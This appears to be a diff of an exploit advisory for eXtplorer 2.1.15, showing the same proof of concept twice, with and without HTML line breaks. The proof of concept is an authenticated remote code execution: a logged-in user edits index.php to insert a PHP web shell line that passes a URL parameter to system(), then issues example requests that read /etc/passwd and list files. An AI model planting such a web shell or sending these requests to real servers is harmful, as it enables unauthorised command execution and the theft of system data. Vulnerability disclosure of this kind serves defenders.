1 | | - | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) |
2 | | - | Date: 2022-11-09 |
3 | | - | Author: Francisco Marinho |
4 | | - | Vendor Homepage: http://extplorer.net/ |
5 | | - | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip |
6 | | - | Version: 2.1.15 |
7 | | - | Tested on: Linux |
8 | | - | ==========> POC <========== |
9 | | - | |
10 | | - | 1- Login with your account |
11 | | - | 2- Access the directory /index.php |
12 | | - | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. |
13 | | - | 4- Acess homepage index.php |
14 | | - | Examples: |
15 | | - | cat /etc/passwd |
16 | | - | /index.php?tristao=cat%20%20/etc/passwd |
17 | | - | cat ls -la |
18 | | - | /index.php?tristao=ls%20-la |
| 1 | + | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)<br> |
| 2 | + | Date: 2022-11-09<br> |
| 3 | + | Author: Francisco Marinho<br> |
| 4 | + | Vendor Homepage: http://extplorer.net/<br> |
| 5 | + | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip<br> |
| 6 | + | Version: 2.1.15<br> |
| 7 | + | Tested on: Linux<br> |
| 8 | + | ==========> POC <==========<br> |
| 9 | + | <br> |
| 10 | + | 1- Login with your account<br> |
| 11 | + | 2- Access the directory /index.php<br> |
| 12 | + | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.<br> |
| 13 | + | 4- Acess homepage index.php<br> |
| 14 | + | Examples:<br> |
| 15 | + | cat /etc/passwd<br> |
| 16 | + | /index.php?tristao=cat%20%20/etc/passwd<br> |
| 17 | + | cat ls -la<br> |
| 18 | + | /index.php?tristao=ls%20-la<br> |
19 | 19 | | |